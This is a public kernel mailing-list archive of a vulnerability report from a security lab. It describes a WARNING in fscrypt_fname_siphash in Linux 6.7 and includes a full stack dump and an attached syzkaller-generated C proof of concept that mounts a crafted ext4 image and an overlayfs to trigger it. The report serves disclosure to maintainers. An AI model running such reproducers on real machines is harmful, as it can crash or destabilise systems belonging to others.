* WARNING in fscrypt_fname_siphash
@ 2024-05-09 6:33 Ubisectech Sirius
0 siblings, 0 replies; only message in thread
From: Ubisectech Sirius @ 2024-05-09 6:33 UTC (permalink / raw
To: linux-trace-kernel, linux-kernel; +Cc: ebiggers, tytso, jaegeuk
[-- Attachment #1: Type: text/plain, Size: 3346 bytes --]
Hello.
We are Ubisectech Sirius Team, the vulnerability lab of China ValiantSec. Recently, our team has discovered a issue in Linux kernel 6.7. Attached to the email were a PoC file of the issue.
Stack dump:
------------[ cut here ]------------
WARNING: CPU: 0 PID: 10070 at fs/crypto/fname.c:573 fscrypt_fname_siphash+0xdf/0x120 fs/crypto/fname.c:573
Modules linked in:
CPU: 0 PID: 10070 Comm: syz-executor.2 Not tainted 6.7.0 #2
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
RIP: 0010:fscrypt_fname_siphash+0xdf/0x120 fs/crypto/fname.c:573
Code: 00 00 00 fc ff df 48 89 f9 48 c1 e9 03 80 3c 01 00 75 3f 48 8b 7b 08 48 83 c4 10 5b 5d 41 5c e9 d7 79 6e 08 e8 f2 a2 80 ff 90 <0f> 0b 90 eb 93 48 89 14 24 e8 b3 5b d7 ff 48 8b 14 24 eb b7 e8 48
RSP: 0018:ffffc90002887238 EFLAGS: 00010246
RAX: 0000000000040000 RBX: ffffc900028872d0 RCX: ffffc900030cb000
RDX: 0000000000040000 RSI: ffffffff8209535e RDI: 0000000000000001
RBP: ffff888063065180 R08: 0000000000000001 R09: 0000000000000000
R10: 0000000000000000 R11: 000000008d4c4d91 R12: 0000000000000000
R13: 0000000000000001 R14: dffffc0000000000 R15: ffff888056aba0c4
FS: 00007ff63b86f640(0000) GS:ffff88802c600000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007ff5442398e0 CR3: 0000000057fd8000 CR4: 0000000000750ef0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
<TASK>
__ext4fs_dirhash+0x36a/0xb60 fs/ext4/hash.c:268
ext4fs_dirhash+0x246/0x2d0 fs/ext4/hash.c:322
htree_dirblock_to_tree+0x821/0xc90 fs/ext4/namei.c:1124
ext4_htree_fill_tree+0x32d/0xc40 fs/ext4/namei.c:1219
ext4_dx_readdir fs/ext4/dir.c:597 [inline]
ext4_readdir+0x1d2d/0x36a0 fs/ext4/dir.c:142
iterate_dir+0x1f4/0x5c0 fs/readdir.c:106
ovl_dir_read fs/overlayfs/readdir.c:315 [inline]
ovl_indexdir_cleanup+0x2e2/0x940 fs/overlayfs/readdir.c:1183
ovl_get_indexdir fs/overlayfs/super.c:887 [inline]
ovl_fill_super+0x414d/0x6560 fs/overlayfs/super.c:1404
vfs_get_super fs/super.c:1338 [inline]
get_tree_nodev+0xda/0x190 fs/super.c:1357
vfs_get_tree+0x93/0x380 fs/super.c:1771
do_new_mount fs/namespace.c:3337 [inline]
path_mount+0x679/0x1e40 fs/namespace.c:3664
do_mount fs/namespace.c:3677 [inline]
__do_sys_mount fs/namespace.c:3886 [inline]
__se_sys_mount fs/namespace.c:3863 [inline]
__x64_sys_mount+0x287/0x310 fs/namespace.c:3863
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0x43/0x120 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x6f/0x77
RIP: 0033:0x7ff63aa8fd6d
Code: c3 e8 97 2b 00 00 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ff63b86f028 EFLAGS: 00000246 ORIG_RAX: 00000000000000a5
RAX: ffffffffffffffda RBX: 00007ff63abcc120 RCX: 00007ff63aa8fd6d
RDX: 0000000020000000 RSI: 0000000020000040 RDI: 0000000000000000
RBP: 00007ff63aaf14cd R08: 0000000020000140 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 000000000000006e R14: 00007ff63abcc120 R15: 00007ff63b84f000
</TASK>
Thank you for taking the time to read this email and we look forward to working with you further.
[-- Attachment #2: poc.c --]
[-- Type: application/octet-stream, Size: 23208 bytes --]
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <setjmp.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/mount.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/loop.h>
#ifndef __NR_memfd_create
#define __NR_memfd_create 319
#endif
static unsigned long long procid;
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
//% This code is derived from puff.{c,h}, found in the zlib development. The
//% original files come with the following copyright notice:
//% Copyright (C) 2002-2013 Mark Adler, all rights reserved
//% version 2.3, 21 Jan 2013
//% This software is provided 'as-is', without any express or implied
//% warranty. In no event will the author be held liable for any damages
//% arising from the use of this software.
//% Permission is granted to anyone to use this software for any purpose,
//% including commercial applications, and to alter it and redistribute it
//% freely, subject to the following restrictions:
//% 1. The origin of this software must not be misrepresented; you must not
//% claim that you wrote the original software. If you use this software
//% in a product, an acknowledgment in the product documentation would be
//% appreciated but is not required.
//% 2. Altered source versions must be plainly marked as such, and must not be
//% misrepresented as being the original software.
//% 3. This notice may not be removed or altered from any source distribution.
//% Mark Adler madler@alumni.caltech.edu
//% BEGIN CODE DERIVED FROM puff.{c,h}
#define MAXBITS 15
#define MAXLCODES 286
#define MAXDCODES 30
#define MAXCODES (MAXLCODES + MAXDCODES)
#define FIXLCODES 288
struct puff_state {
unsigned char* out;
unsigned long outlen;
unsigned long outcnt;
const unsigned char* in;
unsigned long inlen;
unsigned long incnt;
int bitbuf;
int bitcnt;
jmp_buf env;
};
static int puff_bits(struct puff_state* s, int need)
{
long val = s->bitbuf;
while (s->bitcnt < need) {
if (s->incnt == s->inlen)
longjmp(s->env, 1);
val |= (long)(s->in[s->incnt++]) << s->bitcnt;
s->bitcnt += 8;
}
s->bitbuf = (int)(val >> need);
s->bitcnt -= need;
return (int)(val & ((1L << need) - 1));
}
static int puff_stored(struct puff_state* s)
{
s->bitbuf = 0;
s->bitcnt = 0;
if (s->incnt + 4 > s->inlen)
return 2;
unsigned len = s->in[s->incnt++];
len |= s->in[s->incnt++] << 8;
if (s->in[s->incnt++] != (~len & 0xff) ||
s->in[s->incnt++] != ((~len >> 8) & 0xff))
return -2;
if (s->incnt + len > s->inlen)
return 2;
if (s->outcnt + len > s->outlen)
return 1;
for (; len--; s->outcnt++, s->incnt++) {
if (s->in[s->incnt])
s->out[s->outcnt] = s->in[s->incnt];
}
return 0;
}
struct puff_huffman {
short* count;
short* symbol;
};
static int puff_decode(struct puff_state* s, const struct puff_huffman* h)
{
int first = 0;
int index = 0;
int bitbuf = s->bitbuf;
int left = s->bitcnt;
int code = first = index = 0;
int len = 1;
short* next = h->count + 1;
while (1) {
while (left--) {
code |= bitbuf & 1;
bitbuf >>= 1;
int count = *next++;
if (code - count < first) {
s->bitbuf = bitbuf;
s->bitcnt = (s->bitcnt - len) & 7;
return h->symbol[index + (code - first)];
}
index += count;
first += count;
first <<= 1;
code <<= 1;
len++;
}
left = (MAXBITS + 1) - len;
if (left == 0)
break;
if (s->incnt == s->inlen)
longjmp(s->env, 1);
bitbuf = s->in[s->incnt++];
if (left > 8)
left = 8;
}
return -10;
}
static int puff_construct(struct puff_huffman* h, const short* length, int n)
{
int len;
for (len = 0; len <= MAXBITS; len++)
h->count[len] = 0;
int symbol;
for (symbol = 0; symbol < n; symbol++)
(h->count[length[symbol]])++;
if (h->count[0] == n)
return 0;
int left = 1;
for (len = 1; len <= MAXBITS; len++) {
left <<= 1;
left -= h->count[len];
if (left < 0)
return left;
}
short offs[MAXBITS + 1];
offs[1] = 0;
for (len = 1; len < MAXBITS; len++)
offs[len + 1] = offs[len] + h->count[len];
for (symbol = 0; symbol < n; symbol++)
if (length[symbol] != 0)
h->symbol[offs[length[symbol]]++] = symbol;
return left;
}
static int puff_codes(struct puff_state* s, const struct puff_huffman* lencode,
const struct puff_huffman* distcode)
{
static const short lens[29] = {3, 4, 5, 6, 7, 8, 9, 10, 11, 13,
15, 17, 19, 23, 27, 31, 35, 43, 51, 59,
67, 83, 99, 115, 131, 163, 195, 227, 258};
static const short lext[29] = {0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 2,
2, 3, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 0};
static const short dists[30] = {
1, 2, 3, 4, 5, 7, 9, 13, 17, 25,
33, 49, 65, 97, 129, 193, 257, 385, 513, 769,
1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577};
static const short dext[30] = {0, 0, 0, 0, 1, 1, 2, 2, 3, 3,
4, 4, 5, 5, 6, 6, 7, 7, 8, 8,
9, 9, 10, 10, 11, 11, 12, 12, 13, 13};
int symbol;
do {
symbol = puff_decode(s, lencode);
if (symbol < 0)
return symbol;
if (symbol < 256) {
if (s->outcnt == s->outlen)
return 1;
if (symbol)
s->out[s->outcnt] = symbol;
s->outcnt++;
} else if (symbol > 256) {
symbol -= 257;
if (symbol >= 29)
return -10;
int len = lens[symbol] + puff_bits(s, lext[symbol]);
symbol = puff_decode(s, distcode);
if (symbol < 0)
return symbol;
unsigned dist = dists[symbol] + puff_bits(s, dext[symbol]);
if (dist > s->outcnt)
return -11;
if (s->outcnt + len > s->outlen)
return 1;
while (len--) {
if (dist <= s->outcnt && s->out[s->outcnt - dist])
s->out[s->outcnt] = s->out[s->outcnt - dist];
s->outcnt++;
}
}
} while (symbol != 256);
return 0;
}
static int puff_fixed(struct puff_state* s)
{
static int virgin = 1;
static short lencnt[MAXBITS + 1], lensym[FIXLCODES];
static short distcnt[MAXBITS + 1], distsym[MAXDCODES];
static struct puff_huffman lencode, distcode;
if (virgin) {
lencode.count = lencnt;
lencode.symbol = lensym;
distcode.count = distcnt;
distcode.symbol = distsym;
short lengths[FIXLCODES];
int symbol;
for (symbol = 0; symbol < 144; symbol++)
lengths[symbol] = 8;
for (; symbol < 256; symbol++)
lengths[symbol] = 9;
for (; symbol < 280; symbol++)
lengths[symbol] = 7;
for (; symbol < FIXLCODES; symbol++)
lengths[symbol] = 8;
puff_construct(&lencode, lengths, FIXLCODES);
for (symbol = 0; symbol < MAXDCODES; symbol++)
lengths[symbol] = 5;
puff_construct(&distcode, lengths, MAXDCODES);
virgin = 0;
}
return puff_codes(s, &lencode, &distcode);
}
static int puff_dynamic(struct puff_state* s)
{
static const short order[19] = {16, 17, 18, 0, 8, 7, 9, 6, 10, 5,
11, 4, 12, 3, 13, 2, 14, 1, 15};
int nlen = puff_bits(s, 5) + 257;
int ndist = puff_bits(s, 5) + 1;
int ncode = puff_bits(s, 4) + 4;
if (nlen > MAXLCODES || ndist > MAXDCODES)
return -3;
short lengths[MAXCODES];
int index;
for (index = 0; index < ncode; index++)
lengths[order[index]] = puff_bits(s, 3);
for (; index < 19; index++)
lengths[order[index]] = 0;
short lencnt[MAXBITS + 1], lensym[MAXLCODES];
struct puff_huffman lencode = {lencnt, lensym};
int err = puff_construct(&lencode, lengths, 19);
if (err != 0)
return -4;
index = 0;
while (index < nlen + ndist) {
int symbol;
int len;
symbol = puff_decode(s, &lencode);
if (symbol < 0)
return symbol;
if (symbol < 16)
lengths[index++] = symbol;
else {
len = 0;
if (symbol == 16) {
if (index == 0)
return -5;
len = lengths[index - 1];
symbol = 3 + puff_bits(s, 2);
} else if (symbol == 17)
symbol = 3 + puff_bits(s, 3);
else
symbol = 11 + puff_bits(s, 7);
if (index + symbol > nlen + ndist)
return -6;
while (symbol--)
lengths[index++] = len;
}
}
if (lengths[256] == 0)
return -9;
err = puff_construct(&lencode, lengths, nlen);
if (err && (err < 0 || nlen != lencode.count[0] + lencode.count[1]))
return -7;
short distcnt[MAXBITS + 1], distsym[MAXDCODES];
struct puff_huffman distcode = {distcnt, distsym};
err = puff_construct(&distcode, lengths + nlen, ndist);
if (err && (err < 0 || ndist != distcode.count[0] + distcode.count[1]))
return -8;
return puff_codes(s, &lencode, &distcode);
}
static int puff(unsigned char* dest, unsigned long* destlen,
const unsigned char* source, unsigned long sourcelen)
{
struct puff_state s = {
.out = dest,
.outlen = *destlen,
.outcnt = 0,
.in = source,
.inlen = sourcelen,
.incnt = 0,
.bitbuf = 0,
.bitcnt = 0,
};
int err;
if (setjmp(s.env) != 0)
err = 2;
else {
int last;
do {
last = puff_bits(&s, 1);
int type = puff_bits(&s, 2);
err = type == 0 ? puff_stored(&s)
: (type == 1 ? puff_fixed(&s)
: (type == 2 ? puff_dynamic(&s) : -1));
if (err != 0)
break;
} while (!last);
}
*destlen = s.outcnt;
return err;
}
//% END CODE DERIVED FROM puff.{c,h}
#define ZLIB_HEADER_WIDTH 2
static int puff_zlib_to_file(const unsigned char* source,
unsigned long sourcelen, int dest_fd)
{
if (sourcelen < ZLIB_HEADER_WIDTH)
return 0;
source += ZLIB_HEADER_WIDTH;
sourcelen -= ZLIB_HEADER_WIDTH;
const unsigned long max_destlen = 132 << 20;
void* ret = mmap(0, max_destlen, PROT_WRITE | PROT_READ,
MAP_PRIVATE | MAP_ANON, -1, 0);
if (ret == MAP_FAILED)
return -1;
unsigned char* dest = (unsigned char*)ret;
unsigned long destlen = max_destlen;
int err = puff(dest, &destlen, source, sourcelen);
if (err) {
munmap(dest, max_destlen);
errno = -err;
return -1;
}
if (write(dest_fd, dest, destlen) != (ssize_t)destlen) {
munmap(dest, max_destlen);
return -1;
}
return munmap(dest, max_destlen);
}
static int setup_loop_device(unsigned char* data, unsigned long size,
const char* loopname, int* loopfd_p)
{
int err = 0, loopfd = -1;
int memfd = syscall(__NR_memfd_create, "syzkaller", 0);
if (memfd == -1) {
err = errno;
goto error;
}
if (puff_zlib_to_file(data, size, memfd)) {
err = errno;
goto error_close_memfd;
}
loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
err = errno;
goto error_close_memfd;
}
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
if (errno != EBUSY) {
err = errno;
goto error_close_loop;
}
ioctl(loopfd, LOOP_CLR_FD, 0);
usleep(1000);
if (ioctl(loopfd, LOOP_SET_FD, memfd)) {
err = errno;
goto error_close_loop;
}
}
close(memfd);
*loopfd_p = loopfd;
return 0;
error_close_loop:
close(loopfd);
error_close_memfd:
close(memfd);
error:
errno = err;
return -1;
}
static void reset_loop_device(const char* loopname)
{
int loopfd = open(loopname, O_RDWR);
if (loopfd == -1) {
return;
}
if (ioctl(loopfd, LOOP_CLR_FD, 0)) {
}
close(loopfd);
}
static long syz_mount_image(volatile long fsarg, volatile long dir,
volatile long flags, volatile long optsarg,
volatile long change_dir,
volatile unsigned long size, volatile long image)
{
unsigned char* data = (unsigned char*)image;
int res = -1, err = 0, need_loop_device = !!size;
char* mount_opts = (char*)optsarg;
char* target = (char*)dir;
char* fs = (char*)fsarg;
char* source = NULL;
char loopname[64];
if (need_loop_device) {
int loopfd;
memset(loopname, 0, sizeof(loopname));
snprintf(loopname, sizeof(loopname), "/dev/loop%llu", procid);
if (setup_loop_device(data, size, loopname, &loopfd) == -1)
return -1;
close(loopfd);
source = loopname;
}
mkdir(target, 0777);
char opts[256];
memset(opts, 0, sizeof(opts));
if (strlen(mount_opts) > (sizeof(opts) - 32)) {
}
strncpy(opts, mount_opts, sizeof(opts) - 32);
if (strcmp(fs, "iso9660") == 0) {
flags |= MS_RDONLY;
} else if (strncmp(fs, "ext", 3) == 0) {
bool has_remount_ro = false;
char* remount_ro_start = strstr(opts, "errors=remount-ro");
if (remount_ro_start != NULL) {
char after = *(remount_ro_start + strlen("errors=remount-ro"));
char before = remount_ro_start == opts ? '\0' : *(remount_ro_start - 1);
has_remount_ro = ((before == '\0' || before == ',') &&
(after == '\0' || after == ','));
}
if (strstr(opts, "errors=panic") || !has_remount_ro)
strcat(opts, ",errors=continue");
} else if (strcmp(fs, "xfs") == 0) {
strcat(opts, ",nouuid");
}
res = mount(source, target, fs, flags, opts);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
res = open(target, O_RDONLY | O_DIRECTORY);
if (res == -1) {
err = errno;
goto error_clear_loop;
}
if (change_dir) {
res = chdir(target);
if (res == -1) {
err = errno;
}
}
error_clear_loop:
if (need_loop_device)
reset_loop_device(loopname);
errno = err;
return res;
}
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
/*offset=*/0ul);
install_segv_handler();
NONFAILING(memcpy((void*)0x200008c0, "ext4\000", 5));
NONFAILING(memcpy((void*)0x20000180, "./bus\000", 6));
NONFAILING(memcpy((void*)0x20000380, "user_xattr", 10));
NONFAILING(*(uint8_t*)0x2000038a = 0x2c);
NONFAILING(memcpy((void*)0x2000038b, "jqfmt=vfsold", 12));
NONFAILING(*(uint8_t*)0x20000397 = 0x2c);
NONFAILING(memcpy((void*)0x20000398, "test_dummy_encryption", 21));
NONFAILING(*(uint8_t*)0x200003ad = 0x2c);
NONFAILING(*(uint8_t*)0x200003ae = 0);
NONFAILING(memcpy(
(void*)0x20000a00,
"\x78\x9c\xec\xdb\xcf\x8f\x13\x55\x1c\x00\xf0\xef\x4c\xb7\x8b\x08\xb8\x2b"
"\xe2\x0f\x7e\xa8\xab\x68\xdc\xf8\x63\x97\x05\x54\x0e\x1e\xd4\x68\xe2\x01"
"\x13\x13\x3d\xe8\x71\xb3\xbb\x10\xa4\xb0\x86\x5d\x13\x20\x44\xc1\x18\x3c"
"\x19\x63\xe2\xdd\x78\xf4\x5f\xf0\xa4\x17\x63\x3c\x99\x78\xd5\xbb\x21\x21"
"\x86\x0b\xe0\xa9\x66\xda\x19\xb6\x2d\x6d\x61\x4b\xbb\x45\xfb\xf9\x24\xb3"
"\xfb\xde\xcc\x9b\xbe\xf7\xed\xcc\x6b\xdf\xcc\xeb\x04\x30\xb2\xa6\xb2\x3f"
"\x49\xc4\xd6\x88\xf8\x23\x22\x26\xea\xd9\xe6\x02\x53\xf5\x7f\xd7\xae\x9c"
"\x5b\xb8\x7e\xe5\xdc\x42\x12\xd5\xea\xbb\x7f\x27\xb5\x72\x57\xaf\x9c\x5b"
"\x28\x8a\x16\xfb\x6d\xc9\x33\xd3\x69\x44\xfa\x79\x12\xbb\xdb\xd4\xbb\x72"
"\xe6\xec\xf1\xf9\x4a\x65\xe9\x54\x9e\x9f\x5d\x3d\xf1\xd1\xec\xca\x99\xb3"
"\x2f\x1c\x3b\x31\x7f\x74\xe9\xe8\xd2\xc9\xfd\x87\x0e\x1d\x3c\x30\xf7\xf2"
"\x4b\xfb\x5f\xec\x4b\x9c\x59\x9b\xae\xee\xfa\x64\x79\xcf\xce\xb7\x3e\xf8"
"\xfa\xed\xc3\x5f\x66\xeb\xc6\x8b\xf8\x5b\xe2\xe8\x93\xa9\x6e\x1b\x9f\xae"
"\x56\xfb\x5c\xdd\x70\x6d\x6b\x48\x27\x63\x43\x6c\x08\xeb\x52\x8a\x88\xec"
"\x70\x95\x6b\xfd\x7f\x22\x4a\xb1\x76\xf0\x26\xe2\xcd\xcf\x86\xda\x38\x60"
"\xa0\xaa\xd5\x6a\x75\x4b\xe7\xcd\xe7\xab\xc0\xff\x58\x12\xcd\x79\x5d\x1e"
"\x46\x45\xf1\x45\x9f\x5d\xff\x16\x4b\xeb\x20\xe0\xd5\xc1\x0d\x3f\x86\xee"
"\xf2\x6b\xf5\x0b\xa0\x2c\xee\x6b\xf9\x52\xdf\x32\x16\x69\x5e\xa6\xdc\x72"
"\x7d\xdb\x4f\x53\x11\xf1\xfe\xf9\x7f\xbe\xcd\x96\x18\xcc\x7d\x08\x00\x80"
"\x26\x3f\x66\xe3\x9f\xe7\xdb\x8d\xff\xd2\x78\xa8\xa1\xdc\x7d\xf9\xdc\xd0"
"\x64\x44\xdc\x1f\x11\xdb\x23\xe2\x81\x88\xd8\x11\x11\x0f\x46\xd4\xca\x3e"
"\x1c\x11\x8f\xac\xb3\xfe\xd6\x49\x92\x9b\xc7\x3f\xe9\xa5\x9e\x02\xbb\x4d"
"\xd9\xf8\xef\x95\x7c\x6e\xab\x79\xfc\x57\x8c\xfe\x62\xb2\x94\xe7\xb6\xd5"
"\xe2\x2f\x27\x47\x8e\x55\x96\xf6\xe5\xef\xc9\x74\x94\x37\x65\xf9\xb9\x2e"
"\x75\xfc\xf4\xc6\xef\x5f\x75\xda\xd6\x38\xfe\xcb\x96\xac\xfe\x62\x2c\x98"
"\xb7\xe3\xd2\xd8\xa6\xe6\x7d\x16\xe7\x57\xe7\xef\x24\xe6\x46\x97\x2f\x44"
"\xec\x1a\x6b\x17\x7f\x72\x63\x26\x20\x89\x88\x9d\x11\xb1\xab\xc7\x3a\x8e"
"\x3d\xfb\xfd\x9e\x4e\xdb\x6e\x1d\x7f\x17\x7d\x98\x67\xaa\x7e\x17\xf1\x4c"
"\xfd\xf8\x9f\x8f\x96\xf8\x0b\x49\xf7\xf9\xc9\xd9\x7b\xa2\xb2\xb4\x6f\xb6"
"\x38\x2b\x6e\xf6\xeb\x6f\x17\xdf\xe9\x54\xff\x1d\xc5\xdf\x07\xd9\xf1\xbf"
"\xb7\xed\xf9\x7f\x23\xfe\xc9\xa4\x71\xbe\x76\x65\xfd\x75\x5c\xfc\xf3\x8b"
"\x8e\xd7\x34\xbd\x9e\xff\xe3\xc9\x7b\xb5\xf4\x78\xbe\xee\xf4\xfc\xea\xea"
"\xa9\xb9\x88\xf1\xe4\x70\xbd\xd1\x8d\xeb\xf7\xaf\xed\x5b\xe4\x8b\xf2\x59"
"\xfc\xd3\x7b\xdb\xf7\xff\xed\xb1\xf6\x4e\xec\x8e\x88\xec\x24\x7e\x34\x22"
"\x1e\x8b\x88\xc7\xf3\xb6\x3f\x11\x11\x4f\x46\xc4\xde\x2e\xf1\xff\xf2\xfa"
"\x53\x1f\xf6\x1e\xff\x60\x65\xf1\x2f\xae\xeb\xf8\xaf\x25\xc6\xa3\x75\x4d"
"\xfb\x44\xe9\xf8\xcf\x3f\x34\x55\x3a\x79\x53\xfc\xd7\xbb\x1f\xff\x83\xb5"
"\xd4\x74\xbe\xe6\x76\x3e\xff\x6e\xa7\x5d\xbd\x9d\xcd\x00\x00\x00\xf0\xdf"
"\x93\x46\xc4\xd6\x48\xd2\x99\x1b\xe9\x34\x9d\x99\xa9\xff\x5e\x7e\x47\x44"
"\x5a\x59\x5e\x59\x7d\xee\xc8\xf2\xc7\x27\x17\xeb\xcf\x08\x4c\x46\x39\x2d"
"\xee\x74\x4d\x34\xdc\x0f\x9d\xcb\x2f\xeb\xeb\xf9\x0b\x11\x51\xff\x69\x41"
"\xb1\xfd\x40\x7e\xdf\xf8\x9b\xd2\xe6\x5a\x7e\x66\x61\xb9\xb2\x38\xec\xe0"
"\x61\xc4\x6d\xe9\xd0\xff\x33\x7f\x95\x86\xdd\x3a\x60\xe0\x3c\xaf\x05\xa3"
"\x4b\xff\x87\xd1\xa5\xff\xc3\xe8\xd2\xff\x61\x74\xb5\xe9\xff\x9b\x87\xd1"
"\x0e\x60\xe3\xb5\xfb\xfe\xff\x74\x08\xed\x00\x36\x5e\x4b\xff\x37\xed\x07"
"\x23\xc4\xf5\x3f\x8c\x2e\xfd\x1f\x46\x97\xfe\x0f\x23\x69\x65\x73\xdc\xfa"
"\x21\xf9\xae\x89\xe2\x95\x7a\xdc\xbd\x5b\x62\xec\x74\xfd\xa5\xfb\xff\xca"
"\x1b\x90\x88\xf2\x5d\xd1\x8c\x81\x25\x22\xbd\x2b\x9a\x21\x31\xa0\xc4\x10"
"\x3f\x94\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\xe8\xdf\x00"
"\x00\x00\xff\xff\xc7\xde\xdd\xde",
1106));
NONFAILING(syz_mount_image(/*fs=*/0x200008c0, /*dir=*/0x20000180,
/*flags=MS_I_VERSION|MS_DIRSYNC*/ 0x800080,
/*opts=*/0x20000380, /*chdir=*/3, /*size=*/0x452,
/*img=*/0x20000a00));
NONFAILING(memcpy((void*)0x20001040, "./file2\000", 8));
NONFAILING(syz_mount_image(/*fs=*/0, /*dir=*/0x20001040, /*flags=*/0,
/*opts=*/0, /*chdir=*/0, /*size=*/0, /*img=*/0));
NONFAILING(memcpy((void*)0x20000040, "./file0\000", 8));
NONFAILING(memcpy((void*)0x20000000, "overlay\000", 8));
NONFAILING(memcpy((void*)0x20000140, "workdir", 7));
NONFAILING(*(uint8_t*)0x20000147 = 0x3d);
NONFAILING(memcpy((void*)0x20000148, "./file0", 7));
NONFAILING(*(uint8_t*)0x2000014f = 0x2c);
NONFAILING(memcpy((void*)0x20000150, "lowerdir", 8));
NONFAILING(*(uint8_t*)0x20000158 = 0x3d);
NONFAILING(memset((void*)0x20000159, 46, 1));
NONFAILING(*(uint8_t*)0x2000015a = 0x2c);
NONFAILING(memcpy((void*)0x2000015b, "upperdir", 8));
NONFAILING(*(uint8_t*)0x20000163 = 0x3d);
NONFAILING(memcpy((void*)0x20000164, "./file2", 7));
NONFAILING(*(uint8_t*)0x2000016b = 0x2c);
NONFAILING(*(uint8_t*)0x2000016c = 0x2c);
syscall(__NR_mount, /*src=*/0ul, /*dst=*/0x20000040ul, /*type=*/0x20000000ul,
/*flags=*/0ul, /*opts=*/0x20000140ul);
return 0;
}
^ permalink raw reply [flat|nested] only message in thread
only message in thread, other threads:[~2024-05-09 6:38 UTC | newest]
Thread overview: (only message) (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2024-05-09 6:33 WARNING in fscrypt_fname_siphash Ubisectech Sirius
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).